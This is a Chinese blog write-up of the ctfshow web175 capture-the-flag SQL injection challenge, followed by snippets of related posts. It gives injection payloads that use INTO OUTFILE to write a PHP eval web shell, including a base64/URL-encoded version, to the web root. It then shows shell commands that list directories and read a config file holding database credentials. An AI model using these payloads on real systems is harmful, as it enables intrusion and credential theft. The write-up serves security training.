ctfshow-web175详细解答

最新推荐文章于 2023-11-14 17:14:38 发布
最新推荐文章于 2023-11-14 17:14:38 发布
阅读量295 收藏
点赞数
文章标签: php 网络安全 sql web安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68408599/article/details/130302658
版权

!preg_match('/[\x00-\x7f]/i

意思是ascii码值从0-127都被过滤了,无法使用select进行查询

<?php eval($_POST[1]);?>

通过此条语句进行植入代码,代码将作为$_POST参数传递,$_POST[1]参数包含一串可执行代码,然后使用此参数调用eval来执行代码(是什么安全漏洞允许将eval代码添加到代码库中)

99' union select 1,2,"<?php eval($_POST[1]);?>" into outfile '/var/www/html/1.php

导出数据到pc的指定目录下(select into outfile)

<?php eval($_POST[1]);?>进行base64编码再进行URL转换

%50%44%39%77%61%48%41%67%5a%58%5a%68%62%43%67%6b%58%31%42%50%55%31%52%62%4d%56%30%70%4f%7a%38%2b

99' union select 1,from_base64("%50%44%39%77%61%48%41%67%5a%58%5a%68%62%43%67%6b%58%31%42%50%55%31%52%62%4d%56%30%70%4f%7a%38%2b") into outfile '/var/www/html/1.php

抓包显示输入错误,在头部ctf.show/后输入1.php(植入的文件)

显示未定义的偏移量,代表植输入的1.php成功

打开hackbar在里面post传值中输入1=phpinfo();phpinfo — 输出关于 PHP 配置的信息

打开蚁剑

配置相关信息

右击进行数据操作添加相关信息

1=system("ls"); (system(执行shell命令))

可以看见api目录,进入1=system("ls ./api/");

1=system("tac ./api/config.php");进入config.php目录

信息都已经出来,在蚁剑中进行数据操作得到以下数据

B10SS0MS
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
ctfshow web入门题解(一) web1-10
weixin_48604668的博客
07-26 1532
ctfshow靶场的web vip题解前10道
ctfshow SQL注入Web175
m0_62584974的博客
05-01 885
查询语句 //拼接sql语句查找指定ID用户 $sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;"; 返回逻辑 //检查结果是否有flag if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){ $ret['msg']='查询成功'; } Play...
ctfshow web175-183
akxnxbshai的博客
03-14 5969
Web 175 if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))) 刚开始不知道这句话是什莫意思,还在尝试之前的方法,发现没用。 \xnn 匹配ASCII代码中十六进制代码为nn的字符 [\x00-\x7f] 匹配ASCII值从0-127的字符 所以ASCII值得0-127都被过滤了,select没法用了。 只能盲注了,试一下 1' and sleep(6)--+ 发现确实有延迟,所以可以考虑时间盲注。 时间盲注: 通过时间
CTFshow 175 into outfile ‘/var/www/html/1.txt‘
sinat_31884905的博客
05-23 282
[x00-x7f] 匹配ASCII值从0-127的字符 0-127表示单字节字符,也就是:数字,英文字符,半角符号,以及某些控制字符。 限制了页面不能显示任何数据, ?id=1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+&page=1&limit=10 就跳到这里了,真的很神奇,所以说 select xxx from xxx into outfile '/var/
ctfshow_web175
qq_38634097的博客
05-28 288
0-127表示单字节字符:数字,英文字符,半角符号,以及某些控制字符。那我们换个思路,不让在页面显示,写在某个文件里,然后查看文件内容。\xnn 匹配ASCII代码中十六进制代码为nn的字符。[x00-x7f] 匹配ASCII值从0-127的字符。打开场景可以看到在本题中,页面的拦截方式做了改变。也就说,是以上字符的不会在页面显示出来。
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
最新发布
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFShow-周末大挑战parse-url篇Writeup
05-19
CTFShow--周末大挑战parse_url篇Writeup
CTFSHOW web入门 sql注入 无过滤注入 web171-175
sinat_41572027的博客
07-07 1450
ctfshow web171-174
适合小白ctfshow-web入门—sql注入175-248超详细解析!!
2201_75930505的博客
09-12 577
将数据输出到一个文件中,然后访问对应文件: 这是一个UNION查询,它将原始查询的结果与从表中选择的用户名和密码进行合并。: 这部分似乎是将查询结果导出到文件。路径表示要将查询结果写入到位于网页根目录下的名为1.txt的文件中。(路径是一个常见的用于存放网页文件的目录,通常被称为网页根目录。在许多Web服务器中,这个目录被设置为存放网站的主要文件,因此可以通过浏览器访问。
ctfshow web入门题解(二) web11-20
weixin_48604668的博客
08-01 1161
ctfshow的vip题解 希望对各位师傅有所帮助
ctfshow sql入门174 175脚本
2202_75317918的博客
11-14 136
因为觉得脚本写的太烂了,二分法也迷迷糊糊的主要是python怎么学的那么烂!!再研究一下。
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7013
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
【ctf.show-misc赛题】
一纸荒芜的博客
04-12 3462
分享ctf-misc赛题。
CTF show 萌新区解题报告 (一)
qq_51090016的博客
02-23 1483
萌新区1—10)1.萌新认证2.萌新_密码13. 萌新_密码24.萌新 密码35.萌新 隐写2总结: 1.萌新认证 好了好了,我知道我是萌新了。。 2.萌新_密码1 根据经验,这看着应该是16进制,转换成字符串看看: 这就很明显是base64了 这又是啥?看了大佬的wp,原来是栅栏密码(有没有大佬说一下栅栏密码有什么易于分辨的特征),栏数一个个试,还好到2就出来了: 3. 萌新_密码2 这题好坑啊,提示的键盘才是重点。。。 rdcvbg 2qase3 6tghu7这三团字符字符的共同特点就是,在键盘上
CTFSHOW-WEB入门SQL注入部分(大概是长期更新)
Npceer-一位网安初学者的博客
02-01 575
SQL注入0x01 web 171 不一定会所有题都放上来(懒) 但是我尽量 0x01 web 171 总算是开始刷sql注入题了 之前学了 但是没写几题 也算个纯萌新了 所以基础题会细一点 也为了加强自己记忆 1,2,3都能回显 继续直接爆表名 1'union select 1,2,table_name from information_schema.tables where table_schema=database() --+ 直接爆字段 记得ctfshow_user要加'' 我试了半天不知道
【PHP代码注入】PHP语言常见可注入函数以及PHP代码注入漏洞的利用实例
m0_64378913的博客
06-26 6672
目录1 PHP注入概述2 相关函数与语言结构2.1 eval()函数2.2 assert()函数2.3 preg_replace()函数2.4 call_user_func()函数2.5 动态函数`$a($b)`3 总结 1 PHP注入概述 RCE概念:remote command/code execute,远程命令/代码执行。 PHP代码执行:在WEB中,PHP代码执行是指应用程序过滤不严,用户可用通过请求将代码注入到应用中执行。 PHP代码注入与SQL注入比较: 其注入思想是类似的,均是构造语句绕过服务
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

B10SS0MS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值